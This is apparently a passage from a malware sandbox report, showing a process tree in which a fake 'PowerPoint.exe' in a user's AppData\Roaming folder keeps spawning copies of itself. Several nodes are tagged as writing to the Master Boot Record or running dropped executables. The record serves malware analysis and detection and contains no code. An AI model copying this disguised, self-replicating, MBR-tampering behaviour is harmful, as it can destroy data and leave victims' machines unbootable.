C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:28388
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:9884
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:23412
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:14960
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:6848
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:30120
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:3112
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:228
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:25264
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15108
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:20324
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:20684
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:8868
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:21408 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:27180
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21780
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:13688
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:11792
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:7052
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:27412
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:16180
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:39304
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15200
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6948
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:28356
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:8768
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:29364
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:12104
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:2112
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:20516
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:15148
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:5528
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:7072 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:10476
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21136
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:8580
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21520
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:31412
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:11716
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:20052
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵
- Writes to the Master Boot Record (MBR)
PID:27900 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:13100
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:12060
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:5260
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:35652
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:32532
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:26676
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:14444
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:30312
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:26532
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:492
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:22112
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:20128
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:20544
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:35684
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:12344
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6040
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21268
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:31516
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:26404
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:3924
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:21676 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:7916
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:28088
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:12300
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:35604 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:5280
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:31072
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:8508
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:31012
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:4920
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:15328
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:1556
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:3284
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:10488
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21104
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:32464
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:11760
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:5972
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21536
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:16260
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:14780
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:3692
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:28216
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:15784
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:11544
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:14944
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:6972
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵
- Writes to the Master Boot Record (MBR)
PID:35608 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:6016
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:36964
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:12256
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15768
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:24868
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15044
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:7528
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:20592
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:9876
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:23424
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6056
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21380
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:8584
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:21740 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:30972
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:10776
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:20056
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:28168
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:27928
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:16248
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:20108
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:35808
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:22064
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:37552
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:30396
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:30524
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:9168
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:20036
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Writes to the Master Boot Record (MBR)
PID:9440 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21028
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:5316
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:21448 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:30472
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:27432
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:5508
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:28372
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:26268
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:29228
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:25036
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:1732
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6340
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:15272
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:20316
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:10692
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:15852
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21940
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:14928
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:7768
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:21224
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:5608
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Writes to the Master Boot Record (MBR)
PID:21616 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:8704
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:28288
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:4820
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:13176
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:1416
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Writes to the Master Boot Record (MBR)
PID:30104 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21896
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:11052
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:26552
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:15004
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:12656
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:20216 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Executes dropped EXE
PID:6280 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:10616
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:16920
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:22224
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21336
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:13720
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:11112
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:30216
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21700
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:31460
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:21984
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:14452
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:28256
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:20152
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:29992 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:23540
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:10300
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:10920
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:15052
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:6688
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Executes dropped EXE
PID:4864 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:10184
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21212
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:32872
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:16132
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:6120
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21664
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:13372
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:39612
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:27800
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:25204
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:35852
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:8364
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵
- Writes to the Master Boot Record (MBR)
PID:37884 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:26372
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:2768
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:11708
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:20136
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:20552
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:30320
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:11648
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:5776
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:21352 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:12824
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:26452
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:14792
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:7036
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:21708 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15776
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:25212
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15012
-
-
